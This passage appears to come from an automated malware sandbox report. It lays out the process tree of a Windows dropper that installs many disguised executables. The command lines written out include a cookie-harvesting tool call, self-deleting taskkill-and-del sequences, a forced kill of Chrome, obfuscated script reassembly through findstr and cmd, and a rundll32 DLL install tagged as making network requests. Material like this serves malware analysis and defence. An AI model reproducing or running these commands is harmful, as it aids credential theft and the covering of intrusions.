                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-FV0F3.tmp\vpn.tmp
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-FV0F3.tmp\vpn.tmp" /SL5="$603DC,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ziiygxbhphf\vpn.exe" /silent /subid=482
                                                                                                              16⤵
                                                                                                                PID:5512
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Z8X5C0GD92\setups.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Z8X5C0GD92\setups.exe" ll
                                                                                                        12⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:6360
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-G6IJS.tmp\setups.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-G6IJS.tmp\setups.tmp" /SL5="$40418,2051888,270336,C:\Users\Admin\AppData\Local\Temp\Z8X5C0GD92\setups.exe" ll
                                                                                                          13⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks computer location settings
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:6464
                                                                                                    • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
                                                                                                      "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                      11⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:6028
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-3BUNJ.tmp\lylal220.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-3BUNJ.tmp\lylal220.tmp" /SL5="$104A8,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
                                                                                                        12⤵
                                                                                                          PID:5476
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-03OV2.tmp\ysAGEL.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-03OV2.tmp\ysAGEL.exe" /S /UID=lylal220
                                                                                                            13⤵
                                                                                                            • Drops file in Drivers directory
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5392
                                                                                                            • C:\Program Files\Windows Sidebar\YMBMVMULPI\irecord.exe
                                                                                                              "C:\Program Files\Windows Sidebar\YMBMVMULPI\irecord.exe" /VERYSILENT
                                                                                                              14⤵
                                                                                                                PID:6540
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-GGOTU.tmp\irecord.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-GGOTU.tmp\irecord.tmp" /SL5="$2045E,5922518,66560,C:\Program Files\Windows Sidebar\YMBMVMULPI\irecord.exe" /VERYSILENT
                                                                                                                  15⤵
                                                                                                                    PID:7132
                                                                                                                    • C:\Program Files (x86)\i-record\i-record.exe
                                                                                                                      "C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                      16⤵
                                                                                                                        PID:6280
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a5-22814-a28-0b384-2680be7864bfc\Kosaqyrile.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a5-22814-a28-0b384-2680be7864bfc\Kosaqyrile.exe"
                                                                                                                    14⤵
                                                                                                                      PID:4208
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4f-5b235-47a-23eae-075867b7c5e4a\Hotawurosho.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\4f-5b235-47a-23eae-075867b7c5e4a\Hotawurosho.exe"
                                                                                                                      14⤵
                                                                                                                        PID:6480
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rqkkzlmq.min\gaooo.exe & exit
                                                                                                                          15⤵
                                                                                                                            PID:5760
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\rqkkzlmq.min\gaooo.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\rqkkzlmq.min\gaooo.exe
                                                                                                                              16⤵
                                                                                                                                PID:6980
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  17⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  PID:1016
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  17⤵
                                                                                                                                    PID:4176
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bsqyly5x.k0i\jg8_8qyu.exe & exit
                                                                                                                                15⤵
                                                                                                                                  PID:7036
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bsqyly5x.k0i\jg8_8qyu.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bsqyly5x.k0i\jg8_8qyu.exe
                                                                                                                                    16⤵
                                                                                                                                      PID:4740
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xaufrbtb.pex\google-game.exe & exit
                                                                                                                                    15⤵
                                                                                                                                      PID:2820
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\xaufrbtb.pex\google-game.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\xaufrbtb.pex\google-game.exe
                                                                                                                                        16⤵
                                                                                                                                          PID:7088
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\xaufrbtb.pex\google-game.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\xaufrbtb.pex\google-game.exe"
                                                                                                                                            17⤵
                                                                                                                                              PID:5564
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\xaufrbtb.pex\google-game.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\xaufrbtb.pex\google-game.exe"
                                                                                                                                                18⤵
                                                                                                                                                  PID:4124
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\xaufrbtb.pex\google-game.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\xaufrbtb.pex\google-game.exe"
                                                                                                                                                    19⤵
                                                                                                                                                      PID:5836
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                        20⤵
                                                                                                                                                          PID:2700
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vrqmky1t.jz2\BarSetpFile.exe /silent & exit
                                                                                                                                                15⤵
                                                                                                                                                  PID:2276
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vrqmky1t.jz2\BarSetpFile.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\vrqmky1t.jz2\BarSetpFile.exe /silent
                                                                                                                                                    16⤵
                                                                                                                                                      PID:5872
                                                                                                                                                      • C:\ProgramData\1080984.exe
                                                                                                                                                        "C:\ProgramData\1080984.exe"
                                                                                                                                                        17⤵
                                                                                                                                                          PID:7944
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7944 -s 1932
                                                                                                                                                            18⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:7440
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1r13uoua.25r\wwfvd.exe & exit
                                                                                                                                                      15⤵
                                                                                                                                                        PID:420
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1r13uoua.25r\wwfvd.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1r13uoua.25r\wwfvd.exe
                                                                                                                                                          16⤵
                                                                                                                                                            PID:4680
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1r13uoua.25r\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                              17⤵
                                                                                                                                                                PID:5532
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill /im wwfvd.exe /f
                                                                                                                                                                  18⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:6000
                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                  timeout /t 6
                                                                                                                                                                  18⤵
                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                  PID:6928
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tazpnak5.fec\askinstall31.exe & exit
                                                                                                                                                            15⤵
                                                                                                                                                              PID:6712
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tazpnak5.fec\askinstall31.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\tazpnak5.fec\askinstall31.exe
                                                                                                                                                                16⤵
                                                                                                                                                                  PID:7744
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                    17⤵
                                                                                                                                                                      PID:504
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                        18⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:4476
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\atxyvh0v.z5h\toolspab1.exe & exit
                                                                                                                                                                  15⤵
                                                                                                                                                                    PID:2072
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\atxyvh0v.z5h\toolspab1.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\atxyvh0v.z5h\toolspab1.exe
                                                                                                                                                                      16⤵
                                                                                                                                                                        PID:7952
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\atxyvh0v.z5h\toolspab1.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\atxyvh0v.z5h\toolspab1.exe
                                                                                                                                                                          17⤵
                                                                                                                                                                            PID:8096
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z4qjxewd.w4t\GcleanerWW.exe /mixone & exit
                                                                                                                                                                        15⤵
                                                                                                                                                                          PID:7620
                                                                                                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe
                                                                                                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Raw4vpn.exe"
                                                                                                                                                                  11⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:6080
                                                                                                                                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                    "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                    12⤵
                                                                                                                                                                      PID:4296
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Congiunte.vstx
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:4840
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\System32\cmd.exe
                                                                                                                                                                          13⤵
                                                                                                                                                                            PID:6724
                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                              findstr /V /R "^vwjMyTzhxjHATonkmcjOlJMtCRUiLDSlcOLAlCdfhnxfouvyjMTUesyNfophYkCRzbtybXwXyWALgvWvcPVYKYirIYkwzrswWDWKw$" Tue.vstx
                                                                                                                                                                              14⤵
                                                                                                                                                                                PID:4972
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com
                                                                                                                                                                                Infinita.exe.com x
                                                                                                                                                                                14⤵
                                                                                                                                                                                  PID:5400
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\llYHlSDJxbwekicZbE\Infinita.exe.com x
                                                                                                                                                                                    15⤵
                                                                                                                                                                                      PID:3768
                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                    ping 127.0.0.1 -n 30
                                                                                                                                                                                    14⤵
                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                    PID:3676
                                                                                                                                                                            • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                                                                                                                                              "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                                                                                                              11⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              PID:6016
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-V9FUH.tmp\LabPicV3.tmp
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-V9FUH.tmp\LabPicV3.tmp" /SL5="$1045E,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                                                                                                                12⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:5164
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-EVVIL.tmp\alpATCHInO.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-EVVIL.tmp\alpATCHInO.exe" /S /UID=lab214
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:5288
                                                                                                                                                                                    • C:\Program Files\Windows Sidebar\AWYAHIONSE\prolab.exe
                                                                                                                                                                                      "C:\Program Files\Windows Sidebar\AWYAHIONSE\prolab.exe" /VERYSILENT
                                                                                                                                                                                      14⤵
                                                                                                                                                                                        PID:360
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-OQ0NK.tmp\prolab.tmp
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-OQ0NK.tmp\prolab.tmp" /SL5="$304FE,575243,216576,C:\Program Files\Windows Sidebar\AWYAHIONSE\prolab.exe" /VERYSILENT
                                                                                                                                                                                          15⤵
                                                                                                                                                                                            PID:6244
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\99-87530-67c-71589-55159fd001919\Dajejisulae.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\99-87530-67c-71589-55159fd001919\Dajejisulae.exe"
                                                                                                                                                                                          14⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:5448
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\46-5cd36-1f5-46e8b-dbf95938adc36\Kesiguwyra.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\46-5cd36-1f5-46e8b-dbf95938adc36\Kesiguwyra.exe"
                                                                                                                                                                                          14⤵
                                                                                                                                                                                            PID:6684
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3a3ntxfc.afz\gaooo.exe & exit
                                                                                                                                                                                              15⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                              PID:2076
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3a3ntxfc.afz\gaooo.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3a3ntxfc.afz\gaooo.exe
                                                                                                                                                                                                16⤵
                                                                                                                                                                                                  PID:6012
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                    PID:5476
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                      PID:5984
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dttseh1b.mpw\jg8_8qyu.exe & exit
                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                    PID:6796
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\dttseh1b.mpw\jg8_8qyu.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\dttseh1b.mpw\jg8_8qyu.exe
                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                        PID:7136
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxp4pah3.ffs\google-game.exe & exit
                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                        PID:6396
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\wxp4pah3.ffs\google-game.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\wxp4pah3.ffs\google-game.exe
                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                            PID:6680
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:5984
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j440b52y.pp0\BarSetpFile.exe /silent & exit
                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                            PID:5452
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\j440b52y.pp0\BarSetpFile.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\j440b52y.pp0\BarSetpFile.exe /silent
                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:4492
                                                                                                                                                                                                              • C:\ProgramData\2836671.exe
                                                                                                                                                                                                                "C:\ProgramData\2836671.exe"
                                                                                                                                                                                                                17⤵
                                                                                                                                                                                                                  PID:7968
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1876
                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                    PID:4260
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0m355tei.22i\wwfvd.exe & exit
                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                PID:5112
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\0m355tei.22i\wwfvd.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\0m355tei.22i\wwfvd.exe
                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:5288
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\0m355tei.22i\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                      PID:7376
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                        taskkill /im wwfvd.exe /f
                                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                        PID:4256
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                        timeout /t 6
                                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                        PID:8036
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pyewlaxz.0t5\askinstall31.exe & exit
                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                    PID:7152
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\pyewlaxz.0t5\askinstall31.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\pyewlaxz.0t5\askinstall31.exe
                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                        PID:7776
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sdngzell.fdu\toolspab1.exe & exit
                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                        PID:4000
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\sdngzell.fdu\toolspab1.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\sdngzell.fdu\toolspab1.exe
                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                            PID:7960
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\sdngzell.fdu\toolspab1.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\sdngzell.fdu\toolspab1.exe
                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                PID:8008
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2xmqc5zw.3jw\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                              PID:7404
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ohzqvfcf.z0p\setup_10.2_mix.exe & exit
                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                PID:8132
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ohzqvfcf.z0p\setup_10.2_mix.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\ohzqvfcf.z0p\setup_10.2_mix.exe
                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                    PID:4820
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\amaqat4i.24v\file_1.exe & exit
                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                    PID:4864
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\amaqat4i.24v\file_1.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\amaqat4i.24v\file_1.exe
                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                        PID:5364
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                            PID:1424
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\UYGWP52674\multitimer.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\UYGWP52674\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                                                                PID:5568
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\UYGWP52674\multitimer.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\UYGWP52674\multitimer.exe" 1 3.1618088934.607213e670ea6 101
                                                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                                                    PID:6412
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BXCOTG2P1Q\setups.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\BXCOTG2P1Q\setups.exe" ll
                                                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                                                    PID:4948
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-TIL00.tmp\setups.tmp
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-TIL00.tmp\setups.tmp" /SL5="$505E0,2051888,270336,C:\Users\Admin\AppData\Local\Temp\BXCOTG2P1Q\setups.exe" ll
                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                        PID:4964
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Free.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Free.exe"
                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                      PID:4972
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                                                                          PID:4648
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                          PID:7244
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3DBC.tmp.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3DBC.tmp.exe"
                                                                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                                                                              PID:4304
                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m43ilv25.xcj\6762a766.exe & exit
                                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                                          PID:6812
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\m43ilv25.xcj\6762a766.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\m43ilv25.xcj\6762a766.exe
                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                              PID:6228
                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ligztjde.tgj\app.exe /8-2222 & exit
                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                              PID:3952
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ligztjde.tgj\app.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\ligztjde.tgj\app.exe /8-2222
                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                  PID:6100
                                                                                                                                                                                                                                                      • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\8mQGnEqONcmJ.exe
                                                                                                                                                                                                                                                        "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\8mQGnEqONcmJ.exe"
                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        PID:5280
                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
